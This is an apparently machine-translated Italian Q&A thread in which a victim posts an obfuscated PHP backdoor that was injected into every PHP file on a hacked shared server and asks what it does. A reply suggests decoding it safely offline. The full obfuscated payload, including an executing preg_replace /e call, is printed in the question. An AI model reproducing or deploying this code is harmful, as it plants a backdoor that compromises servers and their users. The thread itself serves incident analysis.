Hai bisogno di aiuto per debianizzare il PHP dannoso

2

Recentemente ho avuto un server di hosting condiviso che è stato violato; la seguente riga di codice è stata iniettata nella parte superiore di ogni file PHP sul server:

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $pyyhlxfwxr = '!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x78%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdX%x7825)m%x5c%x7825):fmji%x5c%x7878:5%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x782)#]341]88M4P8]37]278]225]241]334]36vg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:60SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%860opjudovg)!gj!|!*msv%x5c%x787825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>!%x5c%x7825ww2)%x5c%x78251]y33]68]y34]68]y33]824)#P#-#Q#-#B#-#T#-#E#-{hA!osvufs!~<3,j%x5c%x7825>166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%1U,6<*27-SFGTOBSUOSVUFS,6<*x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78255fdy>#]D4]273]D6P2L5%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##QtpzpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825 fjfgg($n){return chr(ord($n)-1);} @error_repo5)}.;%x5c%x7860UQPMSV25i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQc5-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#y%x5c%x7825,3,j%x5c%x7825>jx5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps25)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvc%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x#M5]DgP5]D6#<%x5c%x7829%73", NULL); }6197g:74985-rr.93e:5597f-s.973:c%x785c}X%x5c%x7824<!%%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%xy>#]D6]281L1#%x5c%x782f%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x782x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7865]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OV78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%yfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of25)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmq%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfsf5d816:+946:ce44#)zbssb!>!ss6~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%5!|!*!***b%x5c%x7825)sf%x5c%msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c323ldfid>}&;!osvufs}%x5c%x787f;!opjudo825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvc%x7825yy)#}#-#%x5c%x7824-%x5c%x7824%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)cnbs+yfeobz+sfwjidsb%xMM*<%x22%51%x29%51%x2H,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#|:7#6#)tutjyf%x5c%x7860439275ttfsqnr%x5c%x7878Bsfuvso!sGLOBALS["%x61%156%x75%156%x61"]=1; function%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>Uc%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}4%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2751<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%xy7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]2M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1r#%x5c%x785cq%x5c%x78257%x5cx5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y75c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x782787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~f%163%x74%141%x72%164"22)gj!|!*nbsbq%x5c%x7825x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c3]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]44fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5fepmqnjA%x5c%x7827&6<.fmjjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5e{h+{d%x5c%x7825)+opjudovg+)!gj+A6|7**197-2qj%x5c%x782562%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1tussfw)%x5c%x7825zW%x5c%x7825h>Ez>%x5c%x782272qj%x5c%x7825)7gj6<**2r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5cx5c%x7825)sutcvt)!gj!|!*bubE{h%x5-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x527u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fu5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5cbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJgj<*#k#)usbut%x5c%x7860cepn)%x5c%x7825bss-%x5c%x78w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x7825j:>1<%x5c%x7825j:=t53]Kc]55Ld]55#*<%x5c%x7825bG9%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::5c%x7825%x5c%x787f!~!<##!>!2p%x{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%4-%x5c%x7824*!|!%x5c%x78245c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>78e%x5c%x78b%x5c%x7825w:!>!%x5c7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq5c%x7825t::!>!%x5c%x7824Ypp3)%x55c%x7825b:<!%x5c%x7825c:>%]28y]#%x5c%x782fr%x5c%x7825%x5c%xx78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x78c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5cf+*0f(-!#]y76]277]y72]265]y39]271]y83]2}!+!<+{e%x5c%x7825+*!*+fepdfy]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5825tzw%x5c%x782f%x5c%x7-bubE{h%x5c%x7825)sutcvt)fubmgoj~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-t%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x62%x5f%163%x70%154%x69%164%50%x2225)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5cD2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5rting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%d]252]y74]256]y39]252]y83]273822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepcboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78x7878pmpusut!-#j0#!%x5c%x782f!**#sfmc%x7824gvodujpo!%x5c%x7824-%}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:%x7878pmpusut)tpqssutRe%x5c%x::::-111112)eobs%x5c%x7860un>qp%x5V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{fpo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c)%x5c%x7825j>1<%x5c%x7c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tut]y7:]268]y7f#<!%x5c%x7%x5c%x7878:-!%x5c%x7<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%xgps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825wpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM75]y83]273]y76]277#<w6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui82f2986+7**^%x5c%x782f%x5c%x7825r%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%25w6Z6<.3%x5c%x7860hA%x5*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c7-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubf7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x785cq%x5c%x78257**^r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]x5c%x7825%x5c%x787f!<X>b%xif((function_exists("%x6f%142%x5j{fpg)%x5c%x7825s:*<%x5c%x) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $x5c%x7825%x5c%x7824-%x5c%x7824y4%xsutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%xD!-id%x5c%x7825)uqpuft%x5c%x5)s%x5c%x7825>%x5c%x782fh%5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x5c%x7825<#g6R85,67R37c%x7825!|Z~!<##!>!2p%x5c%x78253]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yb%x5c%x7825!**X)ufttj%x5c%x78)323ldfidk!~!<**qp%x5x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]2]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x785c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x78672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]3851]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ft%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K45c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782fc%x7825tmw)%x5c%x7825tww**WYsbogA%x5c%x7827doj%x5c%x78256<%x5c%x787fufs:~:<*9-1-r%x5c%x782ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223c%x7827pd%x5c%x78256<pd%x5c-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%xx5c%x7825:<**#57]38y]47]67y]37]88y]27#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv}A;~!}%x5c%x787f;!|!}{;)g!*72!%x5c%x7827!hmg%x5c%5)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x782556]y78]248]y83]256]y81]265]y72]254]y76]6P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]fuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%Oc%x5c%x782f#00#W~!Ydrr)%x5c%x7825QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^pdov{h19275j{hnpd19275!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofm5]43]321]464]284]364]6]27f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825j}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x78225r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:25%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#otmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%xjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%sbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{6825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqm+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x78>2bd%x5c%x7825!<5h%x5c%x7825%xsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257w2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>28]322]3]364]6]283]427]36]373P6]36]73]8x5c%x7825ggg)(0)%x5c%x78272%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]/(.*)/epreg_replaceofqxosjrru'; $peyjqdmyjs = explode(chr((183-139)),'7333,32,3252,22,7391,53,2462,43,792,46,5856,57,512,57,3749,48,3797,22,5642,33,8280,44,1091,54,4812,31,5820,36,4148,59,1382,42,6915,24,8658,27,1235,65,6863,52,3298,69,5085,46,4030,65,9611,41,8800,49,56,64,3726,23,7056,37,7093,54,9876,44,3852,34,7937,65,1046,45,2999,28,2505,40,5721,49,7238,21,4264,28,4958,36,8231,49,9652,66,1895,48,3516,25,8553,37,6728,37,2873,57,1820,47,4292,36,569,26,2105,44,5578,64,7578,55,3137,53,9073,53,1485,48,838,21,7524,28,7147,53,0,56,9297,63,343,30,5675,46,5379,32,485,27,1943,64,9360,38,8874,24,595,66,9235,38,960,27,2274,45,7478,46,3093,44,8898,70,1684,32,3932,33,6441,40,3541,44,4547,31,8002,65,1769,51,1716,53,9846,30,6765,59,4639,63,7200,38,4498,49,6290,34,7654,29,2077,28,6047,36,2319,22,8461,61,3367,57,6261,29,4843,58,1867,28,4207,57,3585,49,293,50,7307,26,4766,46,7728,29,3274,24,7757,21,5131,51,1533,52,9515,48,6360,59,6160,54,2149,38,233,60,2407,35,9213,22,3476,40,8612,46,5259,28,3694,32,4578,61,4328,24,738,54,6324,36,9563,48,2545,52,6523,44,7633,21,8324,55,7778,62,5942,63,8849,25,9398,64,899,61,3634,60,1213,22,3027,66,5913,29,7888,49,7840,48,6708,20,2649,63,6481,22,2187,51,8590,22,7552,26,8731,37,5052,33,6214,47,3886,46,120,35,5451,63,8067,68,5287,69,2597,52,10043,63,2773,52,155,43,4702,26,8685,46,4095,53,2238,36,2007,70,7444,34,7019,37,1424,61,6083,28,987,59,6419,22,9718,46,5411,40,9764,43,6610,40,8135,55,4994,32,4901,57,9807,39,859,40,9126,34,2442,20,6005,42,1649,35,3819,33,2362,45,9160,53,3965,65,8522,31,4352,26,9462,53,1182,31,8417,44,5514,64,7259,48,7683,45,1359,23,1145,22,661,20,9008,65,5770,50,4469,29,6111,49,3190,62,681,57,198,35,9980,38,3424,52,9273,24,2930,69,8190,41,6824,39,8379,38,5182,38,4444,25,7365,26,373,43,2712,61,5026,26,1300,59,4728,38,6567,43,9920,60,6939,36,416,25,4378,66,6503,20,5356,23,461,24,8768,32,6650,58,2825,48,6975,44,10018,25,5220,39,8968,40,441,20,1585,64,2341,21,1167,15'); $rcwmfpxjbs=substr($pyyhlxfwxr,(63563-53457),(37-30)); if (!function_exists('djbxmtkyiw')) { function djbxmtkyiw($siiigmplqz, $jcodtyjdch) { $vqvamvvnqx = NULL; for($ttgvvqxcls=0;$ttgvvqxcls<(sizeof($siiigmplqz)/2);$ttgvvqxcls++) { $vqvamvvnqx .= substr($jcodtyjdch, $siiigmplqz[($ttgvvqxcls*2)],$siiigmplqz[($ttgvvqxcls*2)+1]); } return $vqvamvvnqx; };} $odgmnprvdj="\x20\x2a\x726\x6b0\x735\x6e3\x713\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x37\x32\x30\x29\x203\x682\x28\x33\x31\x32\x39\x29\x204\x6a2\x785\x743\x791\x77\x240\x651\x6a1\x645\x792\x73\x240\x791\x684\x786\x770\x72\x29\x3b\x2f\x204\x6f4\x711\x610\x786\x65\x2a\x20"; $pjegxnbdlt=substr($pyyhlxfwxr,(31614-21501),(70-58)); $pjegxnbdlt($rcwmfpxjbs, $odgmnprvdj, NULL); $pjegxnbdlt=$odgmnprvdj; $pjegxnbdlt=(391-270); $pyyhlxfwxr=$pjegxnbdlt-1; ?>

Ovviamente sono in procinto di disconnettere il server e cercare di capire come è stato violato, ma mi piacerebbe capire cosa fa questo codice PHP. Quando visito le pagine violate e visualizzo la fonte, nulla sembra fuori dall'ordinario; non sembra mettere nulla di visibile ai visitatori nelle pagine compromesse. I deobfuscator online che ho provato non sono riusciti con questo esempio, anche se il mio scanner antivirus lo prende come una backdoor. Qualche idea?

    
posta tlng05 24.03.2015 - 03:57
fonte

1 risposta

2

Il decodificatore esadecimale pulisce il \ x crap, che aiuta, ma per decodificare il resto è necessario eseguirlo in PHP , perché è progettato per decodificare se stesso. Se si separano attentamente le dichiarazioni e le si esegue una per una, e fare attenzione a non eseguire mai una valutazione o qualcosa di simile (sostituire 'eval' con 'print' per vedere qual è il codice del programma decodificato, quindi decidere se è sicuro da eseguire).

Non è consigliabile farlo a meno che tu non abbia una certa conoscenza di PHP e una stazione di lavoro rimuovibile che sia fuori dalla rete che puoi < strong> cancella in seguito . Ed è un progetto abbastanza ambizioso che non mi preoccuperei; non devi fare tutto questo per sapere che è malcode.

Se sei solo curioso, allora è diverso. Divertiti. Ma decodificarlo è un esercizio di programmazione semplice e potresti ottenere un aiuto migliore su altri stack.

    
risposta data 24.03.2015 - 04:24
fonte

Leggi altre domande sui tag